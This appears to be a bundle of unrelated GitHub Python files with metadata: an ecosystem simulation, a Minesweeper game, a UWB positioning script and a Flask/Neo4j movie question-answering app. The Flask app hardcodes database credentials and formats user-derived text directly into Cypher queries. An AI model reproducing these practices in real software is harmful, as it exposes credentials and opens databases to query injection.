    # original called a non-existent 'plot_confusion_matrix' -> NameError.
    plotconfusionmatrix(conf_mat, classes=["Angry", "Disgust", "Fear", "Happy", "Sad", "Surprise", "Neutral"])
    plt.show()
if __name__ == '__main__':
    # Script entry point: expects the model file name as argv[1].
    main()
| b01901143/ML2017FALL | hw3/confusion.py | confusion.py | py | 2,433 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "csv.reader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cm",
"line... |
74330584745 | # -*- coding: utf-8 -*-
__author__ = "Amir Arfan, Sebastian Becker"
__email__ = "amar@nmbu.no, sebabeck@nmbu.no"
"""
Simulation of the Island with visualization
"""
from .map import Map
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import subprocess
import random
import os
import textwrap
_FFMPEG_BINARY = "ffmpeg"
_CONVERT_BINARY = "magick"
_DEFAULT_GRAPHICS_DIR = os.path.join("..", "data")
_DEFAULT_GRAPHICS_NAME = "dv"
_DEFAULT_MOVIE_FORMAT = "mp4" # alternatives: mp4, gif
class BioSim:
"""
Simulation of biosim
"""
rgb_value = {
"O": (0.0, 0.0, 1.0),
"M": (0.5, 0.5, 0.5),
"J": (0.0, 0.6, 0.0),
"S": (0.5, 1.0, 0.5),
"D": (1.0, 1.0, 0.5),
}
    def __init__(
        self,
        island_map,
        ini_pop,
        seed,
        ymax_animals=None,
        cmax_animals=None,
        img_base=None,
        img_fmt="png",
    ):
        """
        :param island_map: Multi-line string specifying island geography
        :param ini_pop: List of dictionaries specifying initial population
        :param seed: Integer used as random number seed
        :param ymax_animals: Number specifying y-axis limit for graph showing animal numbers
        :param cmax_animals: Dict specifying color-code limits for animal densities
        :param img_base: String with beginning of file name for figures, including path
        :param img_fmt: String with file type for figures, e.g. 'png'

        If ymax_animals is None, the y-axis limit should be adjusted automatically.
        If cmax_animals is None, sensible, fixed default values should be used.
        cmax_animals is a dict mapping species names to numbers, e.g.,
        {'Herbivore': 50, 'Carnivore': 20}

        If img_base is None, no figures are written to file.
        Filenames are formed as
        '{}_{:05d}.{}'.format(img_base, img_no, img_fmt)
        where img_no are consecutive image numbers starting from 0.
        img_base should contain a path and beginning of a file name.
        """
        self._map = Map(island_map)
        # RGB raster of the island: one colour triple per map cell.
        self.map_rgb = [
            [self.rgb_value[column] for column in row]
            for row in island_map.splitlines()
        ]
        self._map.add_animals(ini_pop)
        # Seed both RNGs so a simulation is reproducible.
        np.random.seed(seed)
        random.seed(seed)
        self._year = 0
        self._final_year = None
        self._num_animals = 0
        self._num_animals_per_species = {}
        self._animal_distribution = None
        self.img_fmt = img_fmt
        self.img_count = 0  # consecutive number used in saved figure names
        self.img_base = img_base
        # Figure/axes handles — created lazily in _setup_graphics().
        self._island_map = None
        self._fig = None
        self._map_ax = None
        self._mean_ax = None
        self._herb_line = None
        self._carn_line = None
        self.herb_heat = None
        self.carn_heat = None
        self.herb_img_axis = None
        self.carn_img_axis = None
        self.year_counter_active = False  # True once the year label exists
        if ymax_animals is None:
            self.ymax_animals = 20000  # default y-limit of population plot
        else:
            self.ymax_animals = ymax_animals
        if cmax_animals is not None:
            self.cmax_animals = cmax_animals
        else:
            # Default colour-scale caps for the two heat maps.
            self.cmax_animals = {"Herbivore": 50, "Carnivore": 20}
    def set_animal_parameters(self, species, params):
        """
        Set parameters for animal species.

        Delegates to the Map, which updates every cell.

        :param species: String, name of animal species
        :param params: Dict with valid parameter specification for species
        """
        self._map.update_animal_params_all_cells(species, params)
    def set_landscape_parameters(self, landscape, params):
        """
        Set parameters for landscape type.

        Delegates to the Map, which updates every cell of that type.

        :param landscape: String, code letter for landscape
        :param params: Dict with valid parameter specification for landscape
        """
        self._map.update_param_all_cells(landscape, params)
    def simulate(self, num_years, vis_years=1, img_years=None):
        """
        Run simulation while visualizing the result.

        :param num_years: number of years to simulate
        :param vis_years: years between visualization updates
        :param img_years: years between visualizations saved to files (default: vis_years)

        Image files will be numbered consecutively.
        """
        if img_years is None:
            img_years = vis_years
        self._final_year = self.year + num_years
        self._setup_graphics()
        while self._year < self._final_year:
            # Draw/save the current state before advancing the island.
            if self._year % vis_years == 0:
                self._update_graphics()
            if self._year % img_years == 0:
                self._save_graphics()
            self._map.cycle()  # one full annual cycle on the island
            self._year += 1
    def _setup_graphics(self):
        """
        Sets up plots and axes for the Simulation to be visualized

        Idempotent: each figure/axes object is only created when it does not
        exist yet, so repeated simulate() calls reuse the same window.
        """
        if self._fig is None:
            self._fig = plt.figure(figsize=(10, 8))
        if self._island_map is None:
            self._create_map()
        if self._mean_ax is None:
            # Population line plot (upper-right panel).
            self._mean_ax = self._fig.add_subplot(2, 2, 2)
            self._mean_ax.set_title("Herbivore and Carnivore Population")
            self._mean_ax.set_ylim(0, self.ymax_animals)
        # x-limit and line padding must track the (possibly extended)
        # final year on every call.
        self._mean_ax.set_xlim(0, self._final_year + 1)
        self._create_herb_line()
        self._create_carn_line()
        self.year_format = "Year: {:5d}"
        if not self.year_counter_active:
            # Year counter text box near the figure's top-left corner.
            self.txt = self._fig.text(
                0.09,
                0.97,
                self.year_format.format(0),
                ha="center",
                va="center",
                bbox=dict(boxstyle="round", ec=(0, 0, 0), fc="none",),
            )
            self.year_counter_active = True
        if self.herb_heat is None:
            self.herb_heat = self._fig.add_subplot(2, 2, 1)
            self.herb_heat.set_title("Herbivore Heat Map")
            self.herb_img_axis = None
        if self.carn_heat is None:
            self.carn_heat = self._fig.add_subplot(2, 2, 3)
            self.carn_heat.set_title("Carnivore Heat Map")
            self.carn_img_axis = None
        self._fig.tight_layout()
    def _update_graphics(self):
        """
        Updates the plots with new data

        Reshapes the per-cell population counts into the map grid and
        refreshes lines, heat maps and the year counter.
        """
        pop_df = self.animal_distribution
        rows, cols = np.shape(self._map.map)
        herb_count = pop_df.Herbivore
        herb_array = np.array(herb_count).reshape(rows, cols)
        carn_count = pop_df.Carnivore
        carn_array = np.array(carn_count).reshape(rows, cols)
        self._update_specie_lines()
        self._update_herb_heatmap(herb_array)
        self._update_carn_heatmap(carn_array)
        self.txt.set_text(self.year_format.format(self.year))
        # Tiny pause lets matplotlib flush the updated frame to screen.
        plt.pause(1e-6)
def _save_graphics(self):
"""
Saves the plots as a specified file type.
"""
if self.img_base is None:
return
print(
"Saving to",
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
),
)
plt.savefig(
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
)
)
self.img_count += 1
    def _create_map(self):
        """
        Creates map plot out of RGB colors and map string.

        Adds a legend patch per landscape type and 1-based tick labels.
        """
        self._island_map = self._fig.add_subplot(2, 2, 4)
        self._island_map.set_title("Island Map")
        self._island_map.imshow(self.map_rgb)
        labels = ["Ocean", "Mountain", "Jungle", "Savannah", "Desert"]
        # One coloured legend patch per landscape letter, in rgb_value order.
        patches = [
            mpatches.Patch(color=self.rgb_value[i], label=labels[n])
            for n, i in enumerate(self.rgb_value.keys())
        ]
        self._island_map.legend(handles=patches, prop={"size": 5}, loc=4)
        self._island_map.set_xticks(range(len(self.map_rgb[0])))
        self._island_map.set_xticklabels(
            labels=(range(1, 1 + len(self.map_rgb[0]))),
            fontdict={"fontsize": 6},
        )
        self._island_map.set_yticks(range(len(self.map_rgb)))
        self._island_map.set_yticklabels(
            labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
        )
    def _create_herb_line(self):
        """
        Creates population graph for Herbivores
        """
        if self._herb_line is None:
            # Fresh line: x spans the whole simulation, y starts as NaN
            # and is filled in year by year.
            herb_plot = self._mean_ax.plot(
                np.arange(0, self._final_year),
                np.full(self._final_year, np.nan),
            )
            self._herb_line = herb_plot[0]
        else:
            # Simulation extended: pad the existing line with NaNs up to
            # the new final year.
            xdata, ydata = self._herb_line.get_data()
            xnew = np.arange(xdata[-1] + 1, self._final_year)
            if len(xnew) > 0:
                ynew = np.full(xnew.shape, np.nan)
                self._herb_line.set_data(
                    np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
                )
    def _create_carn_line(self):
        """
        Creates population graph for Carnivores

        Mirrors _create_herb_line for the carnivore line.
        """
        if self._carn_line is None:
            # Fresh line: NaN placeholders for every simulated year.
            carn_plot = self._mean_ax.plot(
                np.arange(0, self._final_year),
                np.full(self._final_year, np.nan),
            )
            self._carn_line = carn_plot[0]
        else:
            # Simulation extended: pad with NaNs up to the new final year.
            xdata, ydata = self._carn_line.get_data()
            xnew = np.arange(xdata[-1] + 1, self._final_year)
            if len(xnew) > 0:
                ynew = np.full(xnew.shape, np.nan)
                self._carn_line.set_data(
                    np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
                )
def _update_herb_heatmap(self, herb_heat):
"""
Updates the heatmap for Herbivores
"""
if self.herb_img_axis is not None:
self.herb_img_axis.set_data(herb_heat)
else:
self.herb_img_axis = self.herb_heat.imshow(
herb_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Herbivore"],
)
cax = self._fig.add_axes([0.05, 0.5, 0.4, 0.02])
cbar = self._fig.colorbar(
self.herb_img_axis, cax=cax, orientation="horizontal"
)
cbar.set_ticks([])
cbar.ax.text(0.5, 0, "Low", va="bottom", ha="left", color="white")
cbar.ax.text(50, 0, "High", va="bottom", ha="right")
self.herb_heat.set_xticks(range(len(self.map_rgb[0])))
self.herb_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.herb_heat.set_yticks(range(len(self.map_rgb)))
self.herb_heat.set_yticklabels(
labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
)
def _update_carn_heatmap(self, carn_heat):
"""
Updates the heaptmap for Carnivores
"""
if self.carn_img_axis is not None:
self.carn_img_axis.set_data(carn_heat)
else:
self.carn_img_axis = self.carn_heat.imshow(
carn_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Carnivore"],
)
self.carn_heat.set_xticks(range(len(self.map_rgb[0])))
self.carn_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.carn_heat.set_yticks(range(len(self.map_rgb)))
self.carn_heat.set_yticklabels(
labels=(range(1, 1 + len(self.map_rgb))), fontdict={"fontsize": 6}
)
def _update_specie_lines(self):
"""
Updates the population lines for Herbivore and Carnivore
"""
herb_amount = self.num_animals_per_species["Herbivore"]
ydata_herb = self._herb_line.get_ydata()
ydata_herb[self._year] = herb_amount
self._herb_line.set_ydata(ydata_herb)
carn_amount = self.num_animals_per_species["Carnivore"]
ydata_carn = self._carn_line.get_ydata()
ydata_carn[self._year] = carn_amount
self._carn_line.set_ydata(ydata_carn)
self._mean_ax.legend(["Herbivore", "Carnivore"], prop={"size": 6})
def add_population(self, population):
"""
Add a population to the island
:param population: List of dictionaries specifying population
"""
self._map.add_animals(population)
@property
def year(self):
"""Last year simulated."""
return self._year
@property
def num_animals(self):
"""Total number of animals on island."""
self._num_animals = sum(self._map.num_species_on_map())
print(self._num_animals)
return self._num_animals
@property
def num_animals_per_species(self):
"""Number of animals per species in island, as dictionary."""
tot_herbivore, tot_carnivore = self._map.num_species_on_map()
self._num_animals_per_species["Herbivore"] = tot_herbivore
self._num_animals_per_species["Carnivore"] = tot_carnivore
return self._num_animals_per_species
@property
def animal_distribution(self):
"""Pandas DataFrame with animal count per species for each cell on
island. """
list_of_dicts = []
y_lim, x_lim = np.shape(self._map.map)
for y in range(y_lim):
for x in range(x_lim):
curr_cell = self._map.map[(y, x)]
(
curr_herbivores,
curr_carnivores,
) = curr_cell.num_species_per_cell()
curr_dict = {
"Row": y,
"Col": x,
"Herbivore": curr_herbivores,
"Carnivore": curr_carnivores,
}
list_of_dicts.append(curr_dict)
df = pd.DataFrame(
list_of_dicts, columns=["Row", "Col", "Herbivore", "Carnivore"]
)
return df
def make_movie(self, movie_fmt=_DEFAULT_MOVIE_FORMAT):
"""Create MPEG4 movie from visualization images saved."""
if self.img_base is None:
raise RuntimeError("No filename defined.")
if movie_fmt == "mp4":
try:
# Parameters chosen according to
# http://trac.ffmpeg.org/wiki/Encode/H.264, section
# "Compatibility"
subprocess.check_call(
[
_FFMPEG_BINARY,
"-i",
"{}_%05d.png".format(self.img_base),
"-y",
"-profile:v",
"baseline",
"-level",
"3.0",
"-pix_fmt",
"yuv420p",
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError("ERROR: ffmpeg failed with: {}".format(err))
elif movie_fmt == "gif":
try:
subprocess.check_call(
[
_CONVERT_BINARY,
"-delay",
"1",
"-loop",
"0",
"{}_*.png".format(self.img_base),
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError(
"ERROR: convert failed with: {}".format(err)
)
else:
raise ValueError("Unknown movie format: " + movie_fmt)
| amirarfan/BioSim_G03_Amir_Sebastian | src/biosim/simulation.py | simulation.py | py | 15,901 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "map.Map",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_numbe... |
16096100007 | import pygame
import minesweeper_map as mm
pygame.init()
class minesweeper_tile():
def __init__(self, v, f=False, h=True):
self.value = v
self.flag = f
self.hidden = h
def set_value(self, v):
self.value = v
def set_flag(self):
self.flag = not self.flag
def set_hidden(self):
self.hidden = not self.hidden
class minesweeper_game():
TILE_SIZE = 20
LEFT_MOUSE_BUTTON, RIGHT_MOUSE_BUTTON = 1, 3
game_over = False
win = False
img = pygame.image.load('minesweeper_icons.png')
images = []
for i in range(12):
images.append(img.subsurface(TILE_SIZE*i, 0, TILE_SIZE, TILE_SIZE))
def __init__(self, size, bombs):
self.mmap = mm.minesweeper_map(size, bombs)
self.board_size = self.mmap.get_board_size()
self.create_tile_board()
self.create_window(self.board_size, bombs)
self.run_game()
def create_tile_board(self):
self.tile_board = [[minesweeper_tile(0) for _ in range(self.mmap.get_board_size())]
for _ in range(self.mmap.get_board_size())]
for r in range(len(self.mmap.get_board())):
for c in range(len(self.mmap.get_board()[r])):
self.tile_board[r][c].value = self.mmap.get_board()[r][c]
def create_window(self, size, bombs):
self.window = pygame.display.set_mode((size*self.TILE_SIZE, size*self.TILE_SIZE))
pygame.display.set_caption('%s Bombs Total' % (bombs))
def run_game(self):
running = True
while running:
pygame.time.delay(int(1000/60))
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
if e.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_interaction(e)
self.draw_window()
if self.game_over:
pygame.display.set_caption('Game Over')
pygame.time.delay(1000)
running = False
if self.win:
pygame.display.set_caption('You\'ve Won!')
pygame.time.delay(1000)
running = False
pygame.quit()
def handle_mouse_interaction(self, e):
x, y = int(pygame.mouse.get_pos()[0]/self.TILE_SIZE), int(pygame.mouse.get_pos()[1]/self.TILE_SIZE)
corr_tile = self.tile_board[x][y]
if corr_tile.hidden:
if e.button == self.LEFT_MOUSE_BUTTON:
self.handle_hidden(x, y)
if self.get_win():
self.win = True
elif e.button == self.RIGHT_MOUSE_BUTTON:
self.tile_board[x][y].set_flag()
if corr_tile.value == mm.minesweeper_map.BOMB:
if e.button == self.LEFT_MOUSE_BUTTON:
self.game_over = True
def get_win(self):
for row in self.tile_board:
for cell in row:
if cell.hidden and cell.value is not self.mmap.BOMB:
return False
return True
def handle_hidden(self, x, y):
self.tile_board[x][y].set_hidden()
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x-1, y):
if self.tile_board[x-1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x-1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x+1, y):
if self.tile_board[x+1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x+1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y-1):
if self.tile_board[x][y-1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y-1)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y+1):
if self.tile_board[x][y+1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y+1)
def draw_window(self):
for r in range(len(self.tile_board)):
for c in range(len(self.tile_board[r])):
c_tile = self.tile_board[r][c]
if c_tile.flag:
self.window.blit(self.images[11], (r*self.TILE_SIZE, c*self.TILE_SIZE))
elif c_tile.hidden:
self.window.blit(self.images[10], (r*self.TILE_SIZE, c*self.TILE_SIZE))
else:
self.window.blit(self.images[self.tile_board[r][c].value], (r*self.TILE_SIZE, c*self.TILE_SIZE))
pygame.display.update() | mjd-programming/Minesweeper | minesweeper_game.py | minesweeper_game.py | py | 4,549 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pygame.image.load",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "pygame.image",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "minesweeper_map.minesw... |
39363534839 | import os, sys
import csv
import random
import signal
import socket
import threading
import time
import datetime
from fxpmath import Fxp
from Parse_DNN import *
from EKF_AoA import *
import numpy.matlib
import numpy as np
from numpy.linalg import inv
from numpy.core.fromnumeric import transpose
import math
from math import *
import pyvisa as visa
from colorama import Fore
import serial
import serial.tools.list_ports
import serial.serialutil
import matplotlib.pyplot as plt
# ---------------------------------TEST RUN CONFIGS---------------------------------------------------------------------
Rx_DEVICE_COM_PORT = 'com16' #responder COM Port
# ----------------------------------------------------------------------------------------------------------------------
# --------------------------------------NO EDITS BELOW------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def serial_tx(my_port, command):
b_command = command.encode()
my_port.write(b_command)
def serial_rx(my_port):
line = my_port.read_until()
line = line.strip()
return line.decode("utf-8")
def serial_trx(my_port, command):
serial_tx(my_port, command)
return (serial_rx(my_port))
def save_csv(csvf, row):
with open(csvf, "a", newline="") as F:
w = csv.writer(F)
w.writerow(row)
class Unlab_SR150_Resp():
def __init__(self):
''' Set Baudrate '''
self.scpi_rx = serial.Serial(Rx_DEVICE_COM_PORT, baudrate=230400, timeout=6)
self.delay = 3 # delay setting(sec)
'''USER INPUT VARIABLES'''
self.ekf = EKF_AoA() # EKF Object Creation
# self.ref = np.array([0.0001, 1.25]) # reference position of tag
# h_anc = 1.20 # height of anchor(SECC)
# h_tag = 1.15 # height of tag(CAR)
# self.h_diff = h_anc - h_tag
def plot(self):
plt.cla()
plt.xlabel('X(m)', labelpad=20, size=14)
plt.ylabel('Y(m)', labelpad=20, size=14)
plt.axis([-5, 5, 0, 5])
plt.xticks(np.arange(-5, 5, 0.5))
plt.yticks(np.arange(0, 5, 0.5))
for i in range(0,10):
plt.axhline((i+1)/2, -5, 5, color='lightgray', linestyle='--', linewidth=0.7)
for i in range(0,20):
plt.vlines((i-10)/2, 0, 5, color='lightgray', linestyle='--', linewidth=0.7)
x = self.X[0,0]
y = self.X[1,0]
plt.scatter(x,y,color='r',s=450)
plt.pause(0.1)
def Positioning(self):
## Reset all ##
state_ntf_rx = serial_trx(self.scpi_rx, "RST\r\n")
print(state_ntf_rx)
time.sleep(self.delay)
## Ranging start ##
state_ntf_rx = serial_trx(self.scpi_rx, "UWB MTRESP ON\r\n") # Responder Session start Command
print(state_ntf_rx)
time.sleep(self.delay)
while 1:
self.scpi_ret = serial_rx(self.scpi_rx)
try:
## Data Parsing ##
result = self.scpi_ret.split(' ')
session_id = result[0]
distance = Fxp(val="0x"+result[5]+"0x"+result[4], signed=False, n_word=16, n_frac=0).astype(int).tolist() - 10
AoA_azimuth = Fxp(val="0x"+result[7]+"0x"+result[6], signed=True, n_word=16, n_frac=7).astype(float)
PDoA_azimuth = Fxp(val="0x"+result[9]+"0x"+result[8], signed=True, n_word=16, n_frac=7).astype(float)
nlos = Fxp(val="0x"+result[10], signed = False, n_word=8, n_frac = 0).astype(int).tolist()
## convert types for dist and angle
# dist = math.sqrt(math.pow(float(distance)/100,2) - math.pow(self.h_diff,2))
dist = float(distance)/100
angle = math.pi * (float(AoA_azimuth)+90)/180
s_dist = str(dist)
# ## calculate position of TAGs
x = dist * math.cos(angle)
y = dist * math.sin(angle)
x_ref = str(x)
y_ref = str(y)
# r_X2Y2 = pow((x - self.ref[0]),2) + pow((y - self.ref[1]),2)
# r_err = str(r_X2Y2)
if result[0] == '11':
meas = np.array([[x],[y]])
self.ekf.ekf_update1(meas)
self.ekf.cnt1 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,Fore.GREEN,"TAG 1 EKF : ({:.2f}, {:.2f})".format(self.ekf.X1[0][0],self.ekf.X1[1][0]),"\n",Fore.RESET)
elif result[0] == '22':
meas = np.array([[x],[y]])
self.ekf.ekf_update2(meas)
self.ekf.cnt2 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 2 EKF : ({:.2f}, {:.2f})".format(self.ekf.X2[0][0],self.ekf.X2[1][0]),"\n")
elif result[0] == '33':
meas = np.array([[x],[y]])
self.ekf.ekf_update3(meas)
self.ekf.cnt3 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 3 EKF : ({:.2f}, {:.2f})".format(self.ekf.X3[0][0],self.ekf.X3[1][0]),"\n")
elif result[0] == '44':
meas = np.array([[x],[y]])
self.ekf.ekf_update4(meas)
self.ekf.cnt4 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 4 EKF : ({:.2f}, {:.2f})".format(self.ekf.X4[0][0],self.ekf.X4[1][0]),"\n")
else : pass
# x_pos = self.X[0,0]
# y_pos = self.X[1,0]
# e_X2Y2 = pow((x_pos - self.ref[0]),2) + pow((y_pos - self.ref[1]),2)
# e_err = str(e_X2Y2)
# self.plot()
except:
pass
# # print(Fore.GREEN, x_ref, y_ref, scpi_ret,Fore.RESET)
# ## save data(.csv file) ##
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth])
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth, e_err, r_err])
# time.sleep(self.delay)
self.scpi_rx.flush()
result.clear()
if __name__ == "__main__":
# now = datetime.datetime.now()
# nowDatetime = now.strftime('%Y_%m_%d_%H_%M_%S')
# ranging_result_csvF = 'results/UWB_SR150_ranging_test_result-%s.csv' %nowDatetime
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth'])
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth', 'Estimated_Err', 'Ref_Err'])
unlab = Unlab_SR150_Resp()
unlab.Positioning() | yws94/Unlab_SR150 | prev_ver/Unlab_SR150_ver3.py | Unlab_SR150_ver3.py | py | 7,042 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "csv.writer",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "serial.Serial",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cla",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
... |
9366591632 | # coding=utf-8
from flask import Flask, jsonify, render_template, request
from py2neo import Graph
import jw.Q_Search as search
import json
import logging
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='logs/pro2.log',
filemode='a')
app = Flask(__name__)
graph = Graph(
"http://118.25.74.160/",
port= 7474,
username="neo4j",
password="jinwei"
)
f = open("recommend_list.json","r")
d = json.loads(f.read())
f.close()
def buildNodes_g(nodeRecord):
data = {"id": str(nodeRecord['g']['gid']), "name": str(nodeRecord['g']['name']),"label":"Genre"}
return {"data": data}
def buildNodes_m(nodeRecord):
data = {"id": str(nodeRecord['m']['mid']), "name": str(nodeRecord['m']['title']), "label":"Movie"}
return {"data": data}
def buildNodes_p(nodeRecord):
data = {"id": str(nodeRecord['n']['pid']),
"name": str(nodeRecord['n']['pname']) if nodeRecord['n']['pname']!=None else nodeRecord['n']['eng_name'],
"label":"Person"}
return {"data": data}
def buildEdges(relationRecord):
data = {"source": str(relationRecord['r']['mid']),
"target": str(relationRecord['r']['gid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def buildEdges_act(relationRecord):
data = {"source": str(relationRecord['r']['pid']),
"target": str(relationRecord['r']['mid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def get_recommendation(entities):
try:
q = list(entities.values())[0]
print(q)
global d
return d[q]
except:
return "周星驰, 葛优, 巩俐, 冯小刚</div><div>功夫, 十面埋伏, 霸王别姬, 黄飞鸿"
@app.route('/')
def hello_world():
logging.warning("====== user ip: {} ======".format(request.remote_addr))
return render_template('index000.html')
@app.route('/search', methods=['GET'])
def index1():
return render_template('index1.html')
@app.route('/search', methods=['POST'])
def index2():
query = request.form['Search']
logging.warning("====== Query: {} ======".format(query))
#query = query.replace("\n","")
global entities
entities,answer = search.get_query_type(query)
f = open("./templates/index2.html", 'w',encoding="utf-8")
message_front ='''<!DOCTYPE html>
<html>
<head>
<title>Knowledge Graph</title>
<link href="/static/css/style.css" rel="stylesheet" />
<script src="http://cdn.bootcss.com/jquery/1.11.2/jquery.min.js"></script>
<script src="http://cdn.bootcss.com/cytoscape/2.3.16/cytoscape.min.js"></script>
<script src="/static/js/code.js"></script>
</head>
<body>'''
question = '<h3>Your Question</h3>\n<div>'+str(query).replace('\n','')+ '</div>\n'
recommendation = '<h3>You Might Like this</h3><div>'+get_recommendation(entities)+'</div>'
answer = '<h3>Answer</h3>\n<div>' + str(answer).replace('\n','<br>') + "</div>\n"
message_back='''<h3>Movie Graph</h3>
<div id="cy"></div>
</body>
</html>'''
f.write(message_front+question+answer+recommendation+message_back)
f.close()
return render_template('index2.html')
@app.route('/graph')
def get_graph():
try:
nodes = list(map(buildNodes_m, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN m'''.format(entities[0]))))
nodes = nodes+list(map(buildNodes_p, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN n'''.format(entities[0]))))
edges = list(map(buildEdges_act, graph.run('''MATCH (n:Person)-[r]->(m:Movie) where n.pname='{}' RETURN r limit 100'''.format(entities[0]))))
except:
try:
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN m'''.format(entities[1]))))
nodes = nodes+list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN n limit 100'''.format(entities[1]))))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="{}" RETURN g'''.format(entities[1]))))
edges = list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title='{}' RETURN r limit 100'''.format(entities[1]))))
edges = edges + list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="{}" RETURN r limit 100'''.format(entities[1]))))
except:
#print("=============Here is OK=============")
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (m:Movie)-[:is]->() where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN m''')))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN g''')))
nodes = nodes + list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN n''')))
edges = list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
edges = edges + list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
#print("=============Here is OK=============")
# nodes = map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n'))
# edges = map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r'))
return jsonify(elements = {"nodes": nodes, "edges":edges})
if __name__ == '__main__':
app.run(debug = True) | ChandlerBang/Movie-QA-System | flask_app.py | flask_app.py | py | 6,282 | python | en | code | 58 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "flask.Flask",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "py2neo.Graph",
... |
21620206001 | from __future__ import absolute_import
from concurrent.futures import ThreadPoolExecutor
import grpc
from apache_beam.portability.api import beam_runner_api_pb2_grpc
from apache_beam.portability.api.beam_runner_api_pb2_grpc import TestStreamServiceServicer
class TestStreamServiceController(TestStreamServiceServicer):
def __init__(self, events, endpoint=None):
self._server = grpc.server(ThreadPoolExecutor(max_workers=10))
if endpoint:
self.endpoint = endpoint
self._server.add_insecure_port(self.endpoint)
else:
port = self._server.add_insecure_port('[::]:0')
self.endpoint = '[::]:{}'.format(port)
